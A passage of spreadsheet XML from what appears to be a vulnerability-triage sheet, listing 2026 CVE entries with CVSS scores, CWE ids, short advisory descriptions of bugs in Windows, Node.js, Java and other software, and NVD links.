          <t>Vulnerability in the PeopleSoft Enterprise FIN Lease Administration product of Oracle PeopleSoft (component: Lease Administration).   The supported version that is affected is 9.2. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where PeopleSoft Enterprise FIN Lease Administration executes to compromise PeopleSoft Enterprise FIN Lease Administration.  While the vulnerability is in PeopleSoft Enterprise FIN Lease Administration, attacks may significantly impact additional products (scope change).  Successful attacks of this vulnerability can result in  unauthorized creation, deletion or modification access to critical data or all PeopleSoft Enterprise FIN Lease Administration accessible data as well as  unauthorized access to critical data or complete access to all PeopleSoft Enterprise FIN Lease Administration accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality and Integrity impacts).  CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N).</t>
        </is>
      </c>
      <c r="M1100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71092</t>
        </is>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="C1101" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1101" s="5" t="inlineStr"/>
      <c r="F1101" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1101" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1101" s="5" t="inlineStr"/>
      <c r="I1101" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1101" s="5" t="inlineStr"/>
      <c r="K1101" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1101" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="1102">
      <c r="A1102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72923</t>
        </is>
      </c>
      <c r="C1102" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1102" s="5" t="inlineStr"/>
      <c r="F1102" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1102" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1102" s="5" t="inlineStr"/>
      <c r="I1102" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1102" s="5" t="inlineStr"/>
      <c r="K1102" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1102" s="5" t="inlineStr">
        <is>
          <t>In Microsoft.OpenApi.YamlReader from 2.0.0-preview.11 until 2.12.0 and from 3.0.0 until 3.10.0, and in Microsoft.OpenApi.Readers prior to 1.6.30, a small YAML OpenAPI document containing nested anchors and aliases can cause uncontrolled resource consumption when parsed through the public YAML reader APIs. YAML is parsed through SharpYaml, which represents aliases as shared nodes in a directed acyclic graph, so the parsed YAML graph stays small, but converting that graph to System.Text.Json.Nodes.JsonNode requires every alias to be materialized as an independent node because a JsonNode cannot be attached to multiple parents. Without a bound on that conversion work, a document with N nested anchors each referenced k times can require k^N materialized JSON nodes, leading to excessive memory allocation and process termination through out-of-memory conditions, a billion laughs style denial of service. The patched versions bound the YAML-to-JSON conversion by node count and nesting depth and report an OpenApiDiagnostic error instead of expanding without limit. This vulnerability is fixed in Microsoft.OpenApi.YamlReader 2.12.0 and 3.10.0, and Microsoft.OpenApi.Readers 1.6.30.</t>
        </is>
      </c>
      <c r="M1102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72923</t>
        </is>
      </c>
    </row>
    <row r="1103">
      <c r="A1103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
        </is>
      </c>
      <c r="C1103" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1103" s="5" t="inlineStr"/>
      <c r="F1103" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1103" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1103" s="5" t="inlineStr"/>
      <c r="I1103" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1103" s="5" t="inlineStr"/>
      <c r="K1103" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1103" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="1104">
      <c r="A1104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72932</t>
        </is>
      </c>
      <c r="C1104" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1104" s="5" t="inlineStr"/>
      <c r="F1104" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1104" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1104" s="5" t="inlineStr"/>
      <c r="I1104" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1104" s="5" t="inlineStr"/>
      <c r="K1104" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1104" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Message Queuing Queue Manager allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72932</t>
        </is>
      </c>
    </row>
    <row r="1105">
      <c r="A1105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72943</t>
        </is>
      </c>
      <c r="C1105" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1105" s="5" t="inlineStr"/>
      <c r="F1105" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1105" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1105" s="5" t="inlineStr"/>
      <c r="I1105" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1105" s="5" t="inlineStr"/>
      <c r="K1105" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1105" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72943</t>
        </is>
      </c>
    </row>
    <row r="1106">
      <c r="A1106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72949</t>
        </is>
      </c>
      <c r="C1106" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1106" s="5" t="inlineStr"/>
      <c r="F1106" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1106" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1106" s="5" t="inlineStr"/>
      <c r="I1106" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1106" s="5" t="inlineStr"/>
      <c r="K1106" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1106" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows SMB Server Network Transport Driver (srvnet.sys) allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72949</t>
        </is>
      </c>
    </row>
    <row r="1107">
      <c r="A1107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72954</t>
        </is>
      </c>
      <c r="C1107" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1107" s="5" t="inlineStr"/>
      <c r="F1107" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1107" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1107" s="5" t="inlineStr"/>
      <c r="I1107" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1107" s="5" t="inlineStr"/>
      <c r="K1107" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1107" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72954</t>
        </is>
      </c>
    </row>
    <row r="1108">
      <c r="A1108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72989</t>
        </is>
      </c>
      <c r="C1108" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1108" s="5" t="inlineStr"/>
      <c r="F1108" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1108" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1108" s="5" t="inlineStr"/>
      <c r="I1108" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1108" s="5" t="inlineStr"/>
      <c r="K1108" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L1108" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Failover Cluster allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72989</t>
        </is>
      </c>
    </row>
    <row r="1109">
      <c r="A1109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="C1109" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1109" s="5" t="inlineStr"/>
      <c r="F1109" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1109" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1109"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109" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1109" s="5" t="inlineStr"/>
      <c r="K1109" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1109" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="1110">
      <c r="A1110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73088</t>
        </is>
      </c>
      <c r="C1110" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1110" s="5" t="inlineStr"/>
      <c r="F1110" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1110" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1110" s="5" t="inlineStr"/>
      <c r="I1110" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1110" s="5" t="inlineStr"/>
      <c r="K1110" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-248</t>
        </is>
      </c>
      <c r="L1110" s="5" t="inlineStr">
        <is>
          <t>Browserslist is a configuration tool for sharing target browsers and Node.js versions between front-end tools. Prior to 4.28.7, normalizeStats() in node.js, reached unconditionally through getStat() and loadStat() on every browserslist() call, processes untrusted browserslist-stats.json, opts.stats, and CLI --stats data with an unguarded for...in loop and plain-object bracket access and assignment, allowing inherited Object.prototype keys including __proto__, toString, valueOf, constructor, hasOwnProperty, and isPrototypeOf to cause an uncaught TypeError or modify the prototype of the returned normalized object. This issue is fixed in version 4.28.7.</t>
        </is>
      </c>
      <c r="M1110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73088</t>
        </is>
      </c>
    </row>
    <row r="1111">
      <c r="A1111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73089</t>
        </is>
      </c>
      <c r="C1111" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1111" s="5" t="inlineStr"/>
      <c r="F1111" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1111" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1111" s="5" t="inlineStr"/>
      <c r="I1111" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1111" s="5" t="inlineStr"/>
      <c r="K1111" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1111" s="5" t="inlineStr">
        <is>
          <t>Browserslist is a configuration tool for sharing target browsers and Node.js versions between front-end tools. Prior to 4.28.7, index.js retains every distinct `(queries, context)` result in cache and every parseQueries() AST in parseCache without a size cap, TTL, or eviction, allowing an attacker who can influence repeated browserslist() query values, including valid since `&lt;year&gt;-&lt;month&gt;-&lt;day&gt;` queries, to bypass the caller-controlled BROWSERSLIST_DISABLE_CACHE mitigation and cause linear memory growth followed by an out-of-memory process crash. This issue is fixed in version 4.28.7.</t>
        </is>
      </c>
      <c r="M1111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73089</t>
        </is>
      </c>
    </row>
    <row r="1112">
      <c r="A1112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73246</t>
        </is>
      </c>
      <c r="C1112" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1112" s="5" t="inlineStr"/>
      <c r="F1112" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1112" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1112" s="5" t="inlineStr"/>
      <c r="I1112" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1112" s="5" t="inlineStr"/>
      <c r="K1112" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306</t>
        </is>
      </c>
      <c r="L1112" s="5" t="inlineStr">
        <is>
          <t>Kestra is an open-source, event-driven orchestration platform. Prior to 2.0.0-rc6, Kestra's worker/src/main/java/io/kestra/worker/endpoint/WorkerEndpoint.java serves GET /worker without authentication and serializes the complete live Task object, which can expose commands, environment variables, HTTP headers, connection details, plaintext credentials, and execution identifiers while the main API on port 8080 remains protected. This issue is fixed in 2.0.0-rc6.</t>
        </is>
      </c>
      <c r="M1112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73246</t>
        </is>
      </c>
    </row>
    <row r="1113">
      <c r="A1113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73507</t>
        </is>
      </c>
      <c r="C1113" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1113" s="5" t="inlineStr"/>
      <c r="F1113" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1113" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H1113" s="5" t="inlineStr"/>
      <c r="I1113" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1113" s="5" t="inlineStr"/>
      <c r="K1113" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1113" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.xml.XmlFrameDecoder.decode() failed to preserve closing-tag parser state across invocations, so an unauthenticated remote attacker could trickle-feed repeated &lt;/ sequences that repeatedly rescanned the accumulated buffer and exhausted an EventLoop thread's CPU, causing denial of service with a maxFrameLength of 1 MB. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.</t>
        </is>
      </c>
      <c r="M1113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73507</t>
        </is>
      </c>
    </row>
    <row r="1114">
      <c r="A1114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73561</t>
        </is>
      </c>
      <c r="C1114" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1114" s="5" t="inlineStr"/>
      <c r="F1114" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1114" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1114" s="5" t="inlineStr"/>
      <c r="I1114" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1114" s="5" t="inlineStr"/>
      <c r="K1114" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1114" s="5" t="inlineStr">
        <is>
          <t>Hub is a Node.js WebSocket server and client with added features. Prior to 0.2.16, every incoming unauthenticated WebSocket connection triggers loadDefaultConnectionEventListeners to call requestClientId, which calls rpc.send for the get-client-id action and pushes a request into RPC.requests. The RPC.waitForReply function starts a setInterval polling loop every 10 milliseconds that is cleared only after a matching reply; if the client remains silent and closes, the timer and pending request stay allocated because the socket close path does not cancel them. Repeated connections therefore cause unbounded timers and heap entries, exhausting CPU and memory and making the server unavailable. This issue is fixed in version 0.2.16.</t>
        </is>
      </c>
      <c r="M1114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73561</t>
        </is>
      </c>
    </row>
    <row r="1115">
      <c r="A1115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74761</t>
        </is>
      </c>
      <c r="C1115" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1115" s="5" t="inlineStr"/>
      <c r="F1115" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1115" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1115" s="5" t="inlineStr"/>
      <c r="I1115" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1115" s="5" t="inlineStr"/>
      <c r="K1115" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1115" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in TopicRegion in Apache ActiveMQ, Apache ActiveMQ Broker, and Apache ActiveMQ All on all platforms.
An authenticated client can spoof clientId when removing a durable topic subscription.
This issue affects Apache ActiveMQ Broker: before 5.19.11, from 6.0.0 before 6.3.2; Apache ActiveMQ All: before 5.19.11, from 6.0.0 before 6.3.2; Apache ActiveMQ: before 5.19.11, from 6.0.0 before 6.3.2.
Users are recommended to upgrade to version 6.3.2 or 5.19.11 which fixes the issue.</t>
        </is>
      </c>
      <c r="M1115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74761</t>
        </is>
      </c>
    </row>
    <row r="1116">
      <c r="A1116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75328</t>
        </is>
      </c>
      <c r="C1116" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1116" s="5" t="inlineStr"/>
      <c r="F1116" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1116" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1116" s="5" t="inlineStr"/>
      <c r="I1116" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1116" s="5" t="inlineStr"/>
      <c r="K1116" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1116" s="5" t="inlineStr">
        <is>
          <t>In DocSys-master V2.02.85, the downloadDocEx interface in src/com/DocSystem/controller/DocController.java has an arbitrary file read vulnerability:</t>
        </is>
      </c>
      <c r="M1116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75328</t>
        </is>
      </c>
    </row>
    <row r="1117">
      <c r="A1117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76098</t>
        </is>
      </c>
      <c r="C1117" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1117" s="5" t="inlineStr"/>
      <c r="F1117" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1117" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1117" s="5" t="inlineStr"/>
      <c r="I1117" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1117" s="5" t="inlineStr"/>
      <c r="K1117" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1117" s="5" t="inlineStr">
        <is>
          <t>Mistune is a Python Markdown parser with renderers and plugins. Versions 3.3.0 through 3.3.2 are vulnerable to DoS through deeply nested tokens. HTML rendering creates deeply nested emphasis tokens from consecutive asterisk characters, and recursive rendering in HTMLRenderer.render_token() can exceed Python's recursion limit and raise RecursionError, allowing crafted Markdown to crash a parsing process. This issue is fixed in version 3.3.3</t>
        </is>
      </c>
      <c r="M1117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76098</t>
        </is>
      </c>
    </row>
    <row r="1118">
      <c r="A1118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77384</t>
        </is>
      </c>
      <c r="C1118" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1118" s="5" t="inlineStr"/>
      <c r="F1118" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1118" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1118" s="5" t="inlineStr"/>
      <c r="I1118" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1118" s="5" t="inlineStr"/>
      <c r="K1118" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-772</t>
        </is>
      </c>
      <c r="L1118" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. Prior to version 4.2.9, the reservation refresh path in reservation-store.ts reuses the same retimeableSignal but unconditionally registers another abort listener on every refresh. As a result, a remote peer can repeatedly send valid RESERVE requests for the same reservation, causing unbounded listener and closure growth in @libp2p/circuit-relay-v2 relay servers and leading to denial of service. This issue is fixed in version 4.2.9.</t>
        </is>
      </c>
      <c r="M1118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77384</t>
        </is>
      </c>
    </row>
    <row r="1119">
      <c r="A1119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77438</t>
        </is>
      </c>
      <c r="C1119" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1119" s="5" t="inlineStr"/>
      <c r="F1119" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1119" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1119" s="5" t="inlineStr"/>
      <c r="I1119" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1119" s="5" t="inlineStr"/>
      <c r="K1119" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="L1119" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the public share-search endpoint does not enforce the per-note shareCredentials and shareHiddenFromTree controls, allowing an unauthenticated visitor to read the titles, tree paths, and content of protected shared notes. The endpoint authorizes only the ancestor note supplied in the request and then runs a full-text search across the entire published subtree, returning each matching note's title, share identifier, and hierarchical path without re-checking whether that individual note requires a share password or is hidden from the navigation tree. Because the search matches note content, an attacker can enumerate protected notes and use the endpoint as a boolean oracle that confirms arbitrary substrings, recovering the full contents of notes that should be gated behind a password. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M1119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77438</t>
        </is>
      </c>
    </row>
    <row r="1120">
      <c r="A1120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77465</t>
        </is>
      </c>
      <c r="C1120" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1120" s="5" t="inlineStr"/>
      <c r="F1120" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1120" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1120" s="5" t="inlineStr"/>
      <c r="I1120" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1120" s="5" t="inlineStr"/>
      <c r="K1120" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1120" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">toml-node </t>
        </is>
      </c>
      <c r="M1120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77465</t>
        </is>
      </c>
    </row>
    <row r="1121">
      <c r="A1121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
        </is>
      </c>
      <c r="C1121" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
